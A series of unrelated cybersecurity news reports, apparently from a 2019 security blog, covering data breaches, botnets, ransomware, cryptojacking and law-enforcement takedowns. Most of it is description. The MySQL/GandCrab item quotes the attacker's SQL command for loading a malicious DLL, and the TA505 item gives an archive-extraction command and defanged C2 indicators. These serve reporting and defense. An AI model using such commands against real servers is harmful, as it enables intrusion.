Do not respond to the e-mail, even if you really want to prove to the author that your name is in the “case file” by mistake. By doing so, you would be confirming that your address is valid and provoke an even greater wave of spam. For the same reason, do not try to troll the scammers.
Close the message and mark it as spam — this will help the spam filter to do its job better.
Retro video game website Emuparadise revealed to have suffered a data breach that exposed 1.1 Million accounts back in April 2018.
Emuparadise is a website that offers tons of roms, isos and retro video games, users can download and play them with an emulator or play them with the web browser.
The security breach occurred in April 2018 and exposed account information for approximately 1.1 million Emuparadise forum members.
Since August 2018, Emuparadise no longer host game ROMs, anyway it continued to offer any kind of info for retro video games and operated community forums.
Over the weekend, some Emuparadise forum members reported to have received data breach notification notices from the popular services Have I Been Pwned and HackNotice. The notices notify them of the security breach and inform them that their data were exposed as part of the data breach that occurred in April 2018.
The notice issued by the service Have I Been Pwned states that 1,131,229 accounts from Emuparadise forums were exposed in an incident occurred in April 2018. The forums run on a vBulletin CMS, a very popular platform, but older versions are known to be vulnerable to several issues.
HIBP received the data from dehashed.com on June 9th, 2019, exposed info includes mail addresses, IP address, usernames and passwords stored as salted MD5 hashes.
“In April 2018, the self-proclaimed “biggest retro gaming website on earth”, Emupardise, suffered a date breach.” states Have I Been Pwned. “The compromised vBulletin forum exposed 1.1 million email addresses, IP address, usernames and passwords stored as salted MD5 hashes.
At the time of writing, it is not known how DeHashed obtained the huge trove of data.
Experts pointed out that Emuparadise data are offered for sale in the cybercrime underground and on hacking forums since early 2019.
Spanish authorities extradited 94 Taiwanese to China to face telephone and online fraud charges, Taiwan’s Foreign Ministry expressed a strong regret.
Spain extradited 94 Taiwanese to China to face telephone and online fraud charges, the indicted were transferred via plane by officials.
“The suspects arrived Friday morning at Beijing airport on a chartered flight. Footage on state broadcaster CCTV showed uniformed officers escorting them off the China Eastern plane one-by-one.” reads a post published by the AP press.
The Taiwan Central News Agency reported that Taiwan’s Foreign Ministry expressed “serious concern and strong regret.”
The investigation on the scam operations in Spain started in 2016, crooks targeted victims in China. A joint operation conducted by Chinese and Spanish Police allowed the identification of the people involved. In December, authorities raided 13 sites in Madrid, Barcelona and other cities in Spain.
These arrests could be considered as the result of the first joint operation conducted by China with a European country against telecom fraud.
According to the Chinese Public Security Ministry, the telephone and online frauds allowed the suspects to earn 120 million yuan ($17 million).
In the fraud scheme, the criminals impersonate Chinese authorities and attempt to trick victims into transferring money to accounts controlled by the scammers.
“Similar scams operate from several countries and usually prey on Chinese.” continues the AP. “The callers typically masquerade as Chinese authorities and pressure or persuade the victims to transfer money to the scammers’ accounts.”
Spainish authorities already extradited 225 suspects, 218 of which are Taiwanese.
Even is Taiwan split from China in 1949 during a civil war, Beijing still considers the country as part of its territory. The two governments signed an agreement in 2009 to join the efforts in the fight against the crime.
The tension between the countries peaked after the election of Taiwanese President Tsai Ing-wen, that is not considered aligned with Chinese politic.
Chinese authorities asked foreign countries, including Spain, to move criminals to China where they would face severe sentence.
Taiwan evidently doesn’t agree with the decision of Spain authorities of extraditing the suspects to China, instead of its country.
Liu Zhongyi, the deputy director of the Chinese Criminal Investigation Bureau, highlighted the difficulties associated with international investigations that involve differed law frameworks implemented by different states, such as China and Spain.
“We have overcome various difficulties,” Zhongyi told CCTV.
Liu explained that many other criminal gangs operating in the China-Myanmar border area and in Southeast Asia are targeting Chinese citizens.
Microsoft is warning of an active spam campaign targeting European languages that leverages an exploit to infect simply by opening the attachment.
Microsoft issued a warning on Friday about an ongoing spam campaign that is targeting European users. Spam messages are carrying weaponized RTF documents that could infect users with malware without any user interaction, just opening the RTF documents.
The spam messages are sent in various European languages, threat actors are exploiting the Microsoft Office and Wordpad CVE-2017-11882 vulnerability. The tech giant published a series of tweet warning of the spam campaign:
“In the new campaign, the RTF file downloads and runs multiple scripts of different types (VBScript, PowerShell, PHP, others) to download the payload. The backdoor payload then tries to connect to a malicious domain that’s currently down.” warns Microsoft.
The CVE-2017-11882 flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365. The vulnerability could be triggered on all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.
The vulnerability affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.
The component fails to properly handle objects in the memory, a bug that could be exploited by the attacker to execute malicious code in the context of the logged-in user.
Even if the flaw was patched in 2017, experts at Microsoft continue to see threat actors exploiting it in the wild, with a peak in the number of attacks leveraging the issue over the past few weeks.
“Notably, we saw increased activity in the past few weeks. We strongly recommend applying security updates.” states Microsoft.
Once the RTF attachment is opened, it will execute multiple scripts of different types (VBScript, PowerShell, PHP, others) to download the payload.
The payload used in this campaign is a backdoor attempt to connect to a malicious domain that is no longer accessible.
However, experts at Microsoft believe that attackers may use the same tactic to spread a new version of the backdoor that connects to an active C2.
A new botnet tracked as GoldBrute is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.
A new botnet tracked as GoldBrute has appeared in the threat landscape, it is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.
The botnet is currently targeting over 1.5 million unique endpoints online, it is used to brute-force RDP connections or to carry out credential stuffing attacks.
“This botnet is currently brute forcing a list of about 1.5 million RDP servers exposed to the Internet. Shdoan lists about 2.4 million exposed servers . GoldBrute uses its own list and is extending it as it continues to scan and grow.” wrote the researchers Renato Marinho of Morphus Labs who discovered the bot.
The GoldBrute botnet currently has a single command and control server (104[.]156[.]249[.]231), its bots exchange data with the C2 via AES encrypted WebSocket connections to port 8333.
Querying the Shodan search engine for systems with RDP enabled it is possible to find roughly 2.4 million machines.
“An infected system will first be instructed to download the bot code. The download is very large (80 MBytes) and includes the complete Java Runtime. The bot itself is implemented in a Java class called GoldBrute” continues the expert.
“Initially, the bot will start scanning random IP addresses to find more hosts with exposed RDP servers. These IPs are reported back to the C&C server. After the bot reported 80 new victims, the C&C server will assign a set of targets to brute force to the bot.”
Below the complete attack chain:
Botnet brute-forces RDP connection and gains access to a poorly protected Windows system.
It downloads a big zip archive containing the GoldBrute Java code and the Java runtime itself. It uncompresses and runs a jar file called “bitcoin.dll”.
The bot will start to scan the internet for “brutable” RDP servers and send their IPs to the C2 that in turn sends a list of IP addresses to brute force.
GoldBrute bot gets different “host + username + password” combinations.
Bot performs brute-force attack and reports result back to C2 server.
According to the researcher, the list of “brutable” RDP targets is rapidly growing, this suggests that also the size of the botnet is increasing.
“Analyzing the GoldBrute code and understanding its parameters and thresholds, it was possible to manipulate the code to make it save all “host + username + password” combinations on our lab machine.” continues the expert.
“After 6 hours, we received 2.1 million IP addresses from the C2 server from which 1,596,571 are unique. Of course, we didn’t execute the brute-force phase. With the help of an ELK stack, it was easy to geolocate and plot all the addresses in a global world map, as shown below.”
The GoldBrute botnet is difficult to detect because every bot only launches one password-guessing attempt per victim.
The report published by Marinho also includes a list of IoCs.
A new piece of malware appeared in the threat landscape, dubbed BlackSquid it targets web servers with several exploits to deliver cryptocurrency miners.
Security experts at Trend Micro have discovered a new Monero cryptomining miner, dubbed BlackSquid, that is targeting web servers, network drives, and removable drives.
The new piece of malware leverages many exploits to compromise target systems and implements evasion techniques to avoid detection.
According to the experts, BlackSquid has worm-like propagation capabilities and it can be used to launch brute-force attacks.
“This malware, which we named BlackSquid after the registries created and main component file names, is particularly dangerous for several reasons.” states Trend Micro. “It employs anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to continue with installation or not. It also has wormlike behavior for lateral propagation.”
The peculiarity of the BlackSquid malware is the employment of a set of the most dangerous exploits
While many forms of malicious code will employ one or two exploits for known vulnerabilities in popular systems, BlackSquid differs in this regard.
The threat is delivered via infected webpages, exploits, or through removable network drives.
BlackSquid leverages the GetTickCount API to randomly select IP addresses of a web server and to attempt to infect them.
The malware implements anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to deliver the miner or not.
“Simultaneous with its attacks, BlackSquid also downloads and executes two XMRig cryptocurrency-mining components.! continues the analysis. “The miner in resource is the primary miner used, but it also determines if the targeted system has a video card. If the system checks for Nvidia and AMD video cards using WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), the malware downloads the second component into the system to mine for graphics processing unit (GPU) resource.”
The malware halts the infection routine if at least one of the following conditions is met:
The victim’s username is included in a list of common sandbox usernames:
The disk drive model is equal to one included in a specific list;
The device driver, process, and/or dynamic link library is one of a specific list used by the malicious code.
BlackSquid exploits the EternalBlue-DoublePulsar exploits (MS17-010 SMB RCE exploit) to propagate through the target network. The malware uses the remote code execution (RCE) flaw to gain the same user rights as the local system user.
If the infected system has a video card such as Nvidia and AMD video cards using WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), the malicious code downloads a second component into the system to mine for graphics processing unit (GPU) resource.
Trend Micro says that the majority of BlackSquid attacks have, so far, been detected in Thailand and the United States. The last week of May is the most active period on record.
The presence of coding errors and skipped routine suggests that BlackSquid is still in the process of development and testing.
“Given its evasion techniques and the attacks it is capable of, BlackSquid is a sophisticated piece of malware that may cause significant damage to the systems it infects. If successful, this malware may enable an attacker to escalate unauthorized access and privileges, steal proprietary information, render hardware and software useless, or launch attacks on an organization (or even from an organization into another).” concludes Trend Micro.
“But considering the erroneous code and purposely skipped routines, we also think that the cybercriminals behind this malware are likely in the development and testing stages;”
Leicester City Football Club disclosed a card breach that affected its website, hackers stole payment card data, including card numbers and CVVs.
Leicester City Football Club revealed that hackers have breached its website (https://shop.lcfc.com/) and stole credit card data of people that bought products disclosed a card breach that affected its website, hackers stole payment card data, including card numbers and CVVs.
According to the club, the card breach affected some users between April 23 and May 4, the company already notified the supporters whose details were compromised.
The club also informed the authorities and the Information Commissioners Office (ICO), it also launched an immediate investigation.
“Upon discovery of the breach, the security of our retail platform was immediately restored and appropriate measures were taken to ensure the security of all other online assets.” reads the statement issued by the company.
Exposed data includes card number, name of card holder, expiry date and CVV.
“Technical investigations are still ongoing, but we can confirm that as a result of the incident your payment card information was compromised. This includes your card number, name of card holder, expiry date and CVV. We can confirm that your SecureCode was not compromised. That information is needed to attempt to conduct transactions using your account.” reads the email sent to the customers.
At the time of writing, there is information about the attack and the way hackers breached the website of the English club, it is also not clear how many supporters have been impacted.
GandCrab first appeared in the threat landscape in early 2018 and continuously evolved over time. Now operators are shutting down their operations.
Early 2018, experts at cyber security firm LMNTRIX have discovered a new ransomware-as-a-service dubbed GandCrab. advertised in Russian hacking community on the dark web. The GandCrab was advertised in Russian hacking community, researchers noticed that authors leverage the RIG and GrandSoft exploit kits to distribute the malware.
In more than one year its operators released several versions with numerous enhancements, but now they are shutting down their operation and affiliates are being told to stop distributing the ransomware.
In October 2018, experts at the Cybaze Z-Lab have analyzed one of the latest iterations of the infamous GandCrab ransomware, the version 5.0.
Security researchers Damian and David Montenegro, who follow the evolution of the GandCrab since its appearance, the GandCrab operators announced their decision of shutting down their operation in a post in popular hacking forums:
The operators revealed they have generated more than $2 billion in ransom payments, earning on average of $2.5 million dollars per week. The operators revealed to have earned a net of $150 million that now have invested in legal activities.
Guardicore Labs uncovered a widespread cryptojacking campaign tracked as Nansh0u and aimed at Windows MS-SQL and PHPMyAdmin servers.
Security experts at Guardicore Labs uncovered a widespread cryptojacking campaign leveraging a malware dubbed Nansh0u. The malicious code aimed at Windows MS-SQL and PHPMyAdmin servers worldwide.
According to the experts, the malicious campaign is being carried out by a Chinese APT group.
According to the experts Nansh0u malware has already infected nearly 50,000 servers worldwide. Threat actors also delivered a sophisticated kernel-mode rootkit on compromised systems to prevent the malware from being terminated.
“During the past two months, the Guardicore Labs team has been closely following a China-based campaign which aimed to infect Windows MS-SQL and PHPMyAdmin servers worldwide.” reads the report published by Guardicore.
“Breached machines include over 50,000 servers belonging to companies in the healthcare, telecommunications, media and IT sectors. Once compromised, the targeted servers were infected with malicious payloads. These, in turn, dropped a crypto-miner and installed a sophisticated kernel-mode rootkit to prevent the malware from being terminated.”
The attacks date back to February 26, experts observed over seven hundred new victims per day. Researchers discovered 20 versions of malicious payloads, with new payloads created at least once a week and immediately involved in the campaign after their creation time.
Threat actors use to launch brute-force attacks against previously identified Windows MS-SQL and PHPMyAdmin servers that are exposed online.
Once successfully logged in with administrative privileges, threat actors execute a sequence of MS-SQL commands that allow them to download malicious payload from a remote file server and execute it with SYSTEM privileges.
Attackers used two exploits tracked as apexp.exe and apexp2012.exe that trigger the privilege escalation vulnerability CVE-2014-4113. The exploits allow running any executable with SYSTEM privileges.
“Using this Windows privilege, the attacking exploit injects code into the winlogon process. The injected code creates a new process which inherits winlogon’s SYSTEMprivileges, providing equivalent permissions as the prior version.” continues the analysis.
The payloads used in this campaign were droppers used to deliver a cryptocurrency miner to mine TurtleCoincryptocurrency.
Experts observed many payloads dropping a kernel-mode driver using ransom file names and placed them in AppData/Local/Temp. The compile time for these files suggests that it had been created in 2016, but most AV engines still not detect them as malicious.
The driver had a digital signature issued by the top Certificate Authority Verisign.
“We can confidently say that this campaign has been operated by Chinese attackers.” concludes the report.
“We base this hypothesis on the following observations:
The attacker chose to write their tools with EPL, a Chinese-based programming language.
Some of the file servers deployed for this campaign are HFSs in Chinese.
Many log files and binaries on the servers included Chinese strings, such as 结果-去重复 (“duplicates removed”) in logs containing breached machines, or 开始 (“start”) in the name of the script initiating port scans.”
An attack against an Italian organization lead the experts at Yoroi-Cybaze ZLab to shed the light on ongoing operations attributed to TA505.
In the last few days, during monitoring activities, Yoroi CERT noticed a suspicious attack against an Italian organization. The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution, discovering a potential expansion of the TA505 operation. The threat group is also known for its recent attack campaign against Bank and Retail business sectors, but the latest evidence indicates a potential expansion of its criminal operation to other industries too.
The intercepted attack starts with a spear-phishing email embedding a spreadsheet. The document is weaponized with malicious macro code triggered when the user opens the document to see the content under the obfuscated view.
To understand its capabilities, the macro code has been isolated and analyzed in detail. Part of the macro’s content is shown in the following figure.
Surprisingly, the source code is composed by more than 1600 lines of code and it is highly obfuscated. Paying more attention during the code analysis, we discovered that it is full of junk instructions used to declare and initialize variables never used, as shown in Figure 2. Only a small portion of this code is actually used to start the infection, the rest is just junk code.
Once the macro is executed, the malware downloads two files from “kentona[.su”, using an SSL encrypted communication, and stores them in “C:\Users\Public” path: “rtegre.exe” and “wprgxyeqd79.exe”.
Table 3. Information about “wprgxyeqd79.exe” (SFX) downloaded from “kentona[.su”
The “wprgxyeqd79.exe” sample actually is a Self Extracting Archive (SFX/SFA) containing four files designed to be extracted in the %TEMP% folder. After that, it executes “exit.exe” which launches the “i.cmd” batch script.
This new script performs a ping to “www[.cloudflare[.com” for three times with a delay of 3000ms, testing the connectivity of the victim machine. If the host is successfully reached, the script renames a file named “kernel.dll”, obviously not the real one, in “uninstall.exe”, another misleading name. Then it invokes the renamed executable and runs it passing a series of parameter: “uninstall.exe x -pQELRatcwbU2EJ5 -y”
These parameters are needed to self-decrypt the “uninstall.exe” file which is again another SFX archive. The “-p” parameter, indeed, specify the password of the archive to be extracted. The crucial file, at this point of the infection, is the SFX executable named “uninstall.exe”. It has a structure similar to previous “wprgxyeqd79.exe” file: two of their files have the same name, but the content of this new SFX is extracted in the “%ALLUSERSPROFILE%\Windows Anytime Upgrade” directory.
Another time, the execution flow moves from “exit.exe to “i.cmd”. The script is quite different from the previous one: it guarantees its persistence on the victim machine through the setting of “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key, creating a new entry named “Windows Anytime Upgrade” which points to “winserv.exe”, just stored into the same folder. Thus, the script provides to run “winserv.exe”.
An interesting part of the script is the continuous killing of every “rundll32.exe” process running into the victim machine, generates a huge amount of noise, as visible in the following process explorer view.
Anyway, just before the kill loop, the real malicious payload is executed: the “winserv.exe” file. Analyzing it in depth, we discover it actually is the RMS (Remote Manipulator System) client by TektonIT, encrypted using the MPress PE compressor utility, a legitimate tool, to avoid antivirus detection.
TektonIT RMS acts as a remote administration tool, allowing the attacker to gain complete access to the victim machine. Together with the RMS executable, there is another file named “settings.dat”containing the custom configuration prepared by the attacker. It contains information like:
Server address and port the client will connect to
The password chosen by the attacker for the remote access
The ID associated to the victim client
All these information are automatically loaded by the RMS executable and firstly stored in the registry key “HKCU\Software\tektonik\Remote MANIPULATOR System\Host\parameters”. At the next startup, the software will directly load the configuration from the just created key.
The client establishes a new connection with the remote command and control server hosted on a Bulgarian remote host 126.96.36.199, part of a Virtual Dedicated Server subnet of the AS-21100, operated by ITL LLC.
The attack is composed by a complex flow we synthesize in the following scheme:
The TA505 Connection
After the reconstruction of the full infection chain, we noticed strong similarities with a recent spear-phishing attack campaign against an unspecified US retail company. The attack, as stated by CyberInt, leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world, threatening a wide range of high profile companies, active since 2014.
The comparison of the infection chains reveals in both cases the attacker used a couple of SFX stages to deploy the “RMS” software: a legitimate remote administration tool produced by the Russian company “TektonIT”. The tool is able to grant remote access and full, direct control of the infected machine to the group. Also, some code pieces are directly re-used in the analyzed campaigns, such as the “i.cmd” and “exit.exe” files, and, at the same time, some new components have been introduced, for instance the “rtegre.exe” and the “veter1605_MAPS_10cr0.exe” file.
During the analysis, we also noticed the “veter1605_MAPS_10cr0.exe” file slightly changed run after run, a few hours after the initial discovery the infection chain dropped it with different icons, different suffix, from “cr0” to “cr24”, and appendix from “veter1605_” to “veter2005_”. This may indicate the campaign is still ongoing.
The TA505 group is one of the most active threat groups operating since 2014, it has traditionally targeted Banking and Retail industries, as we recently documented during the analysis of the “Stealthy Email Stealer” part of their arsenal. The peculiarity of this recent attack wave is it actually hit a company not strictly in the Banking or Retail sector, as they recently did, suggesting the threat group could be potentially widening their current operations.
Experts at IBM X-Force observed a new campaign involving the HawkEye keylogger in April and May 2019 aimed at business users.
Malware attacks leveraging a new variant of the HawkEyekeylogger have been observed by experts at Talos. The malware has been under active development since at least 2013 and it is offered for sale on various hacking forums as a keylogger and stealer. It allows to monitor systems and exfiltrate information.
The latest variant appeared in the cybercrime underground in December 2018, it was named HawkEyeReborn v9. The author is selling it through a licensing model and is also offering access to updates for specific periods of time.
“IBM X-Force researchers report an increase in HawkEye v9 keylogger infection campaigns targeting businesses around the world.” reads the analysis published by Cisco Talos. “In campaigns observed by X-Force in April and May 2019, the HawkEye malware focused on targeting business users, aiming to infect them with an advanced keylogging malware that can also download additional malware to their devices. “
In April 2019, threat actors launched numerous campaigns aimed at targeting industries such as transportation and logistics, healthcare, import and export, marketing, agriculture, and others.
Attackers delivered the keylogger through malspam campaigns focused on business users. The messages pose as messages sent from a large bank in Spain or fake emails from legitimate companies or from other financial institution.
“X-Force researchers note that the infection process is based on a number of executable files that leverage malicious PowerShell scripts.” continues the post.
Experts noticed that the malspam campaign is originated from Estonia, the malware while experts observed infections worldwide.
“A few campaigns X-Force analyzed in April and May 2019 show that the infrastructure the malspam came from is hosted on similar assets.” concludes Cisco. “It is possible that HawkEye operators further pay for other services from the malware’s vendor, or from another cybercrime vendor serving up spamming campaigns,” IBM concluded.
Experts at PaloAlto Networks spotted a new Shade ransomware campaigns targeting news countries, including in the U.S. and Japan.
Researchers observed a new wave of Shade ransomware attacks against targets in several countries, including the US and Japan.
Shade is considered one of the most dangerous threats in the cyber crime scenario, it has been active at least since 2014 when a massive infection was observed in Russian. The Shade infections increased during October 2018, keeping a constant trend until the second half of December 2018, taking a break around Christmas, and then resuming in mid-January 2019 doubled in size.
“Our results indicate the majority of recent Shade executables have also targeted users outside of Russia.” reads the analysis published by Paloalto Networks.
“In fact, our research shows that the top five countries affected by Shade ransomware are not Russia or nations of the former Soviet Union, they are the United States, Japan, India, Thailand, and Canada,”
Moth of the victims belongs to high-tech, wholesale and education sectors.
Shade has been distributed through malspam campaigns and exploit kits, experts pointed out that its executable (EXE) remains “remarkably consistent” since its discovery in 2014.
Once a Windows system gets infected with this ransomware, the malicious code sets the desktop background to announce the infection. The ransomware also drops on the Desktop 10 text files, named README1.txt through README10.txt,
“Attention! All the important files on your disks were encrypted. The details can be found in README.txt files which you can find on any of your disks.” reads the message left on the background.
The README.txt files include instructions to contact the crooks via an email address in order to receive information on how to make the payments.
The researchers noticed that all the Malspam campaigns spreading the Shade ransomware were retrieving an executable file from a compromised server.
“By focusing on the executable in this chain of events, we can determine where Shade ransomware infection attempts have occurred.” continues the report.
“AutoFocus has a Shade ransomware tag that identifies any items associated with Shade.” explains PaloAlto Networks. “We searched on attempted deliveries of a Shade ransomware executable during an infection chain, and we focused our search on packed executable (PE) files sent through a URL over TCP port 80.”
Experts discovered that most of the URLs hosting Shade ransomware executables were reported from customer devices outside of Russia and Russian language countries.
Technical details, including Indicators of Compromise (IoCs) are reported in the analysis published by the experts.
It’s been a case of good news/bad news when it comes to ransomware recently. New figures from Microsoft suggest that Ireland had one of the lowest rates of infection in the world in 2018. But in early May, a sophisticated strain of ransomware called MegaCortex began spiking across Ireland, the US, Canada, Argentina, France, Indonesia and elsewhere.
Data from Microsoft’s products found that malware and ransomware attacks declined by 60 per cent in Ireland between March and December 2018. Just 1.26 per cent reported so-called ‘encounter rates’, giving Ireland the lowest score in the world.
Hoorays on hold
Don’t break out the bunting just yet, though. As BH Consulting’s CEO Brian Honan told the Daily Swig, the risk for businesses hasn’t disappeared the way it seems. One explanation for the reduced infection rates could be that 2017 happened to be a banner year for ransomware. In that context, that year’s global WannaCry and NotPetya outbreaks skewed the figures and by that reasoning, the ‘fall’ in 2018 is more likely just a regression to the mean.
Security company Sophos analysed MegaCortex and found it uses a formula “designed to spread the infection to more victims, more quickly.” The ransomware has manual components similar to Ryuk and BitPaymer but the adversaries behind MegaCortex use more automated tools to carry out the ransomware attack, which is “unique”, said Sophos.
The risk of ransomware is still very much alive for many organisations, so we’ve combed through our blog archives to uncover some key developments. The content also includes tips and advice to help you stay secure.
In truth, ransomware isn’t a new threat, as a look back through our blog shows. New strains keep appearing, but it’s clear from earlier posts that some broad trends have stayed the same. As Brian recalled in 2014, many victims chose to pay because they couldn’t afford to lose their data. He pointed out that not everyone who parts with their cash gets their data back, which is still true today. “In some cases they not only lose their data but also the ransom money too as the criminals have not given them the code to decrypt it,” he said.
The same dynamic held true in subsequent years. In 2015, Lee Munson wrote that 31 per cent of security professionals would pay if it meant getting data back. It was a similar story one year later. A survey found that 44 per cent of British ransomware victims would pay to access their files again. Lee said this tendency to pay explains ransomware’s popularity among criminals. It’s literally easy money. For victims, however, it’s a hard lesson in how to secure their computer.
Here’s a quick recap of those lessons for individuals and businesses:
Keep software patched and up to date
Employ reputable antivirus software and keep it up to date
Backup your data regularly and most importantly verify that the backups have worked and you can retrieve your data
Make staff and those who use your computers aware of the risks and how to work securely online
By taking those preventative steps, victims of a ransomware infection are in a better position to not pay the ransom. As Brian said in the post: “It doesn’t guarantee that they will get their data back in 100 per cent of cases, and payment only encourages criminals. We have also seen that once victims pay to have their data decrypted, they’re often targeted repeatedly because criminals see them as a soft touch.”
Fortunately, as 2016 wore on, there was some encouraging news. Law enforcement and industry collaborated on the No More Ransom initiative, combining the resources of the Dutch National Police, Europol, Intel Security and Kaspersky Lab. Later that year, BH Consulting was one of 20 organisations accepted on to the programme which expanded to combat the rising tide of infections.
The main No More Ransom website, which remains active today, has information about how the malware works and advice on ransomware protection. It also has free ransomware decryptor tools to help victims unlock their infected devices. Keys are available for some of the most common ransomware variants.
Steps to keeping out ransomware
By 2017, ransomware was showing no signs of stopping. Some variants like WannaCry caused havoc across the healthcare sector and beyond. In May of that year, as a wave of incidents showed no signs of letting up, BH Consulting published a free vendor-neutral guide to preventing ransomware. This nine-page document was aimed at a technical audience and included a series of detailed recommendations such as:
Implement geo-blocking for suspicious domains and regions
Review backup processes
Conduct regular testing of restore process from backup tapes
Review your incident response process
Implement a robust cybersecurity training programme
Implement network segmentation
Monitor DNS logs for unusual activity.
The guide goes into more detail on each bullet point, and is available to download from this link.
Later that year, we also blogged about a digital forensics investigation into a ransomware infection. It was a fascinating in-depth look at the methodical detective work needed to trace the source, identify the specific malware type and figure out what had triggered the infection. (Spoiler: it was a malicious advert.)
Although ransomware is indiscriminate by nature, looking back over three years’ worth of blogs shows some clear patterns. As we noted in a blog published in October 2017, local government agencies and public bodies seem to be especially at risk. Inadequate security practices make it hard to recover from an incident – and increase the chances of needing to pay the criminals.
Obviously, that’s an outcome no-one wants. That’s why all of these blogs share our aim of giving practical advice to avoid becoming another victim. Much of the steps involve simple security hygiene such as keeping anti malware tools updated, and performing regular virus scans and backups. In other words, basic good practice will usually be enough to keep out avoidable infections. Otherwise, as Brian is fond of quoting, “those who cannot remember the past are condemned to repeat it”.
Security researchers are monitoring a new hacking campaign aimed at Joomla and WordPress websites, attackers used .htaccess injector for malicious redirect.
Researchers at Sucuri are warning Joomla and WordPress websites admins of malicious hypertext access (.htaccess) injector found on a client website. The website was used by attackers to redirect traffic to advertising sites that attempted to deliver malware.
“During the process of investigating one of our incident response cases, we found an.htaccess code injection. It had been widely spread on the website, injected into all.htaccess files and redirecting visitors to the http[:]//portal-f[.]pw/XcTyTp advertisement website. ” reads the report.
.htaccess files are configuration files for web servers running the Apache Web Server software. These .htaccess files can be used to alter the configuration of the Apache Web Server software to enable/disable additional functionality and features. The features include the redirect functionality, content password protection or image hot link prevention.
Sucuri spotted threat actors abusing the URL redirect function of the .htaccess file to redirect visitors of compromised websites to phishing sites, sites delivering malware, or simply to generate impressions.
At the time is not clear how attackers gain access to the Joomla and WordPress websites, we only know that they inject the malicious code onto some of the website’s index.php files.
“Below is the code within the ./modules/mod_widgetread_twitt/ index.php file on a Joomla website. This code is responsible for injecting the malicious redirects into the .htaccess files:“
“This code is searching for an .htaccess file. If found, this code will place malicious redirects in the file immediately after “# BEGIN WORDPRESS”.” continues the report.
A warning message from endpoint antivirus software when users try to visit malicious site redirected by Joomla and WordPress sites.
This .php code also searches for more files and folders, trying to search nested folders.
It’s not uncommon to see hackers targeting websites through .htacccess file, including, in October 2018 a security researcher discovered a zero-day vulnerability, tracked as CVE-2018-9206, in older versions of the jQuery File Upload plugin since 2010. Attackers exploited the issue to carry out several malicious activities, including defacement, exfiltration, and malware infection.
alled jQuery File Upload placed 7,800 different software applications at potential risk for compromise and remote code-execution.
The root cause of the problem is that Apache disabled support for .htaccess in version 2.3.9 to improve performance (the server doesn’t have to check for this file every time it accesses a director) and to prevent users from overriding security features that were configured on the server.
The side effect is that the technical choice left some developers and their projects open to attacks.
“While the majority of web applications make use of redirects, these features are also commonly used by bad actors to generate advertising impressions, send unsuspecting site visitors to phishing sites, or other malicious web pages.” concludes Sucuri.
European law enforcement seized and shut down Bestmixer.io for reportedly laundering over $200 million in cryptocurrency.
This week the Europol has dealt another blow to cybercrime, the European police along with the Dutch Fiscal Information and Investigation Service (FIOD), and Luxembourg authorities shut down Bestmixer.io, on one of the world’s leading cryptocurrency mixing services.
A mixing service (aka cryptocurrency tumbler) mixes potentially identifiable or ‘tainted’ cryptocurrency funds with others, making hard to trail back to the fund’s original source. Operators behind mixing services maintain a fee from the original funds.
“A mixing service will cut up a sum of Bitcoins into hundreds of smaller transactions and mixes different transactions from other sources for obfuscation and will pump out the input amount, minus a fee, to a certain output address. Mixing Bitcoins that are obtained legally is not a crime but, other than the mathematical exercise, there no real benefit to it.”reads a blog post published by McAfee.
“The legality changes when a mixing service advertises itself as a success method to avoid various anti-money laundering policies via anonymity. This is actively offering a money laundering service.”
Back in 2018, FIOD launched an investigation, with the support of the security firm McAfee, that led in the seizure of six servers in the Netherlands and Luxembourg.
“Today, the Dutch Fiscal Information and Investigation Service (FIOD), in close cooperation with Europol and the authorities in Luxembourg, clamped down on one of the world’s leading cryptocurrency mixing service Bestmixer.io.” reads the press release published by the Europol.
Bestmixer.io was launched in May 2018, it offered services for mixing the cryptocurrencies bitcoins, bitcoin cash, and litecoins.
Immediately after the launch, the police began investigating the activity of the mixing service.
The numbers behind the service are impressive, it reached a turnover of at least $200 million (approx. 27,000 bitcoins) in 12 months. Of course, the mixing service ensured the total anonymity of its customers.
“The investigation so far into this case has shown that many of the mixed cryptocurrencies on Bestmixer.io had a criminal origin or destination,” continues the Europol. “In these cases, the mixer was probably used to conceal and launder criminal flows of money.”
The Dutch FIOD is investigating data related to all the interactions on this service in the past year. Investigators obtained IP-addresses, transaction details, bitcoin addresses and chat messages associated with the interactions.
“This information will now be analysed by the FIOD in cooperation with Europol and intelligence packages will be shared with other countries.” concludes the press release.
Security experts at Sophos have detected a wave of attacks targeting Windows servers that are running MySQL databases with the intent of delivering the GandCrab ransomware
Sophos researchers have observed a wave of attacks targeting Windows servers that are running MySQL databases, threat actors aim at delivering the GandCrab ransomware.
This is the first time the company sees hackers targeting Windows servers running instances MySQL databases to infect them with ransomware.
The experts discovered the attacks because they hit one of the company’s honeypots that emulates MySQL listening on the default TCP port 3306.
The attackers attempt to connect to the database server and establish that it is running a MySQL instance.
Then, the attacker uses the “set” command to upload all the bytes composing the helper DLL into memory in a variable and wrote out the contents of that variable to a database table named yongger2.
The attacker concatenates the bytes into one file and drops them into the server’s plugin directory. The analysis of the DLL revealed it is used to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.
The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:
CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'
Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine and drops it in the root of the C: drive with the name isetup.exe and executes it.
According to Sophos, at least one Chinese threat actor is currently carrying out such kind of attacks, scanning the internet for Windows servers that are running MySQL databases.
“This particular attack transpired over just a few seconds at about midday, local time, on Sunday, May 19th.” reads the analysis published by Sophos.
“But the URL where the file originated bears some scrutiny. It pointed to an open directory on a web server running server software called HFS, which is a Windows-based web server in the form of a single application.”
